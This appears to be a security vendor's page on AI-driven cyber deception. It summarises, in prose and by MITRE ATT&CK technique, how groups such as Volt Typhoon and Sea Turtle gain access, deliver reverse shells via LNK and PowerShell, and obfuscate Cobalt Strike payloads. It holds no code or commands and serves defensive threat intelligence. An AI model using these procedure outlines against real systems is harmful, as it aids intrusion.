The worst of all deceptions is self-deception
Goal: To optimize deception campaigns based on real-time attacker behavior and threat intelligence.
Approach: Directing and disrupting attacker activities using AI-powered deception techniques.
This element leverages AI and machine learning to analyze attacker behavior, predict their next moves, and dynamically adjust deception tactics.
T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files with LNK files disguised as PDFs. When opened, these executed a PowerShell script to install a reverse shell.
T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.
T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.
T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.
T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.
The attacker may use phishing emails with malicious attachments to deliver and execute a malicious tool, such as a reverse shell, on the victim’s machine. The tool will likely use web protocols to communicate with the attacker’s C2 server.
To gather comprehensive information about malware behavior and identify potential deception parameters.
Deep analysis of malware using symbolic execution.
This element utilizes symbolic execution to analyze malware behavior and extract potential deception parameters. By exploring multiple execution paths, it can reveal hidden behaviors and identify critical system configurations that can be manipulated for deception,
Volt Typhoon actors rely on valid accounts for persistence. They first gain initial access to a network by exploiting vulnerabilities in public-facing applications. Then, they obtain administrator credentials and maintain persistence on the network. They are known to use compromised credentials for follow-on activities, such as logging into the victim’s network via VPN.
Attackers may be using Mshta.exe or Rundll32.exe to execute malicious code.
The Sea Turtle threat actor compromised legitimate cPanel accounts, potentially through brute force attacks or credential stuffing, to gain initial access to target systems. This allowed them to establish a foothold and conduct further malicious activities within the victim’s IT infrastructure.
The attacker is actively scanning the internet for vulnerable hosts, and then compromising those hosts for future malicious activity.
A malicious actor might be leveraging MSHTA for defense evasion and utilizing various techniques for OS credential dumping within the environment.
The CrossC2 framework generates obfuscated Cobalt Strike payloads for Unix-like systems. These payloads contain encrypted configurations and potentially Malleable C2 profiles within an appended overlay. The payload itself may be packed with UPX and further obfuscated with techniques like LLVM string encryption. The configurations are encrypted using AES-128 CBC with a hardcoded key and IV.